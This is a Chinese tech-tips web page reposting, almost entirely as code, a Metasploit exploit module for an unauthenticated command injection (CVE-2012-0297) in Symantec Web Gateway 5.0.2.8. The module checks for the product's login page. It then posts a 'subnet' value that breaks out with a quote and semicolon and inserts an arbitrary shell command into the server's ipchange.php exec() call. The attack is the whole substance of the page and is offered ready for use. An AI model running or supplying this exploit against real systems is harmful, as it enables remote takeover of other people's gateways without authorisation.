当前位置:首页 >> 网络通讯 >> 网络安全 >> 内容

Symantec Web Gateway 5.0.2.8 ipchange.php命令注射

时间:2013/4/19 12:09:00 作者:平凡之路 来源:xuhantao.com 浏览:


require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
       Rank = ExcellentRanking
 
       include Msf::Exploit::Remote::HttpClient
 
       def initialize(info={})
              super(update_info(info,
                     'Name'           => "Symantec Web Gateway 5.0.2.8 ipchange.php Command Injection",
                     'Description'    => %q{
                                   This module exploits a command injection vulnerability found in Symantec Web
                            Gateway's HTTP service due to the insecure usage of the exec() function. This module
                            abuses the spywall/ipchange.php file to execute arbitrary OS commands without
                            authentication.
                     },
                     'License'        => MSF_LICENSE,
                     'Author'         =>
                            [
                                   'Tenable Network Security', # Vulnerability Discovery
                                   'juan vazquez' # Metasploit module
                            ],
                     'References'     =>
                            [
                                   [ 'CVE', '2012-0297' ],
                                   [ 'BID', '53444' ],
                                   [ 'URL', '' ],
                                   [ 'URL', '?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120517_00' ]
                            ],
                     'Payload'        =>
                            {
                                   'BadChars' => "\x00\x0d\x0a\x26",
                                   'Compat'      =>
                                          {
                                                 'PayloadType' => 'cmd',
                                                 'RequiredCmd' => 'generic perl',
                                          }
                            },
                     'Platform'       => ['unix'],
                     'Arch'           => ARCH_CMD,
                     'Targets'        =>
                            [
                                   ['Symantec Web Gateway 5.0.2.8', {}],
                            ],
                     'Privileged'     => false,
                     'DisclosureDate' => "May 17 2012",
                     'DefaultTarget'  => 0))
       end
 
 
       def check
              res = send_request_raw({
                     'method' => 'GET',
                     'uri'    => '/spywall/login.php'
              })
 
              if res and res.body =~ /\<title\>Symantec Web Gateway\<\/title\>/
                     return Exploit::CheckCode::Detected
              else
                     return Exploit::CheckCode::Safe
              end
       end
 
       def exploit
              uri = target_uri.path
              uri << '/' if uri[-1,1] != '/'
 
              peer = "#{rhost}:#{rport}"
 
              post_data = "subnet="
              post_data << "\";" + payload.raw + ";#"
 
              print_status("#{peer} - Sending Command injection")
              res = send_request_cgi({
                     'method' => 'POST',
                     'uri'    => "#{uri}spywall/ipchange.php",
                     'data'   => post_data
              })
 
              # If the server doesn't return the default redirection, probably
              # something is wrong
              if not res or res.code != 302 or res.headers['Location'] !~ /SW\/admin_config.php/
                     print_error("#{peer} - Probably command not executed, aborting!")
                     return
              end
 
       end
 
 
end ,涛涛电脑知识网,涛涛电脑知识网

相关文章
  • 没有相关文章
共有评论 0相关评论
发表我的评论
  • 大名:
  • 内容:
  • 徐汉涛(www.xuhantao.com) © 2024 版权所有 All Rights Reserved.
  • 部分内容来自网络,如有侵权请联系站长尽快处理 站长QQ:965898558(广告及站内业务受理) 网站备案号:蒙ICP备15000590号-1